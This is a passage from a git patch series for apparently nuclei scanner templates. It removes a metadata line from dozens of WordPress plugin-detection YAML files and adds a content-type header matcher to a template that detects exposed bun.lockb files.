b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 0219efd81c532bed8cc2f454896189c5309eeb1a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Sep 2023 11:19:08 +0530 Subject: [PATCH 0273/1090] added header --- http/exposures/files/bun-lock.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/exposures/files/bun-lock.yaml b/http/exposures/files/bun-lock.yaml index 32815f2829..5bbb5fec70 100644 --- a/http/exposures/files/bun-lock.yaml +++ b/http/exposures/files/bun-lock.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 verified: true - shodan-query: html:"bun.lockb" + fofa-query: body=="bun.lockb" tags: exposure,files,node,npm,bun http: @@ -28,6 +28,11 @@ http: - "#!/usr/bin/env bun" condition: or + - type: word + part: header + words: + - "application/octet-stream" + - type: 